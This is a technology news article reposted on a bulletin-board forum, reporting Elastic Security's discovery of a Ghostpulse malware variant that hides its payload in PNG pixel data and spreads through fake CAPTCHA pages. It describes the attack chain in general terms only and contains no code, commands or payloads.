1. Forum
  2. tqw
  3. TQW GENTECH

  • This sneaky Ghostpulse malware hides in PNG image files

    From TechnologyDaily@1337:1/100 to All on Tuesday, October 22, 2024 17:15:05
    This sneaky Ghostpulse malware hides in PNG image files

    Date:
    Tue, 22 Oct 2024 16:03:00 +0000

    Description:
    Ghostpulse malware appears to have greatly evolved over the last two years.

    FULL STORY ======================================================================

    Cybersecurity researchers from Elastic Security have uncovered a new version of the infamous Ghostpulse malware hiding in the pixels of a .PNG file.

    In their technical write-up, the researchers explained the malwares operators continue to demonstrate incredible levels of creativity and knowledge, as
    they find new ways to distribute the malware and hide it from antivirus programs and endpoint protection solutions.

    The move marks a major shift from Ghostpulses previous obfuscation technique, which included abusing the IDAT chunk of PNG files to hide malicious
    payloads, it was said. Reading PNG files

    To infect the victim with the malware, the crooks would first use social engineering to trick the victim into visiting an attacker-controlled website. There, the visitor would be presented with what appeared to be your standard CAPTCHA. However, instead of finding images of a dog or a fire hydrant, the visitors are asked to press a specific keyboard shortcut, which copies a malicious piece of JavaScript code into the clipboard.

    That code triggers a PowerShell script that downloads and runs the Ghostpulse payload.

    The payload is a single file - a benign but compromised executable file that includes a PNG file within its resources section. The malware works by
    looking at the specific pixels and reading their color to collect information hidden inside. The colors are broken into small chunks of data, which are
    then checked using a type of math test to see if they contain hidden malware instructions.

    If they pass the test, the malware gathers the information, and uses XOR to unlock and use the hidden instructions, ultimately infecting the endpoint.

    Ghostpulse is usually used as a loader, deploying more dangerous malware to the compromised systems. Elastic Security found that most of the time, the crooks use it to deploy the Lumma infostealer.

    Via The Register More from TechRadar Pro Sneaky malware abuses CAPTCHA to bypass browser protections Here's a list of the best firewalls today We've also rounded up the best VPN with antivirus around



    ======================================================================
    Link to news story: https://www.techradar.com/pro/security/this-sneaky-ghostpulse-malware-hides-in -png-image-files


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)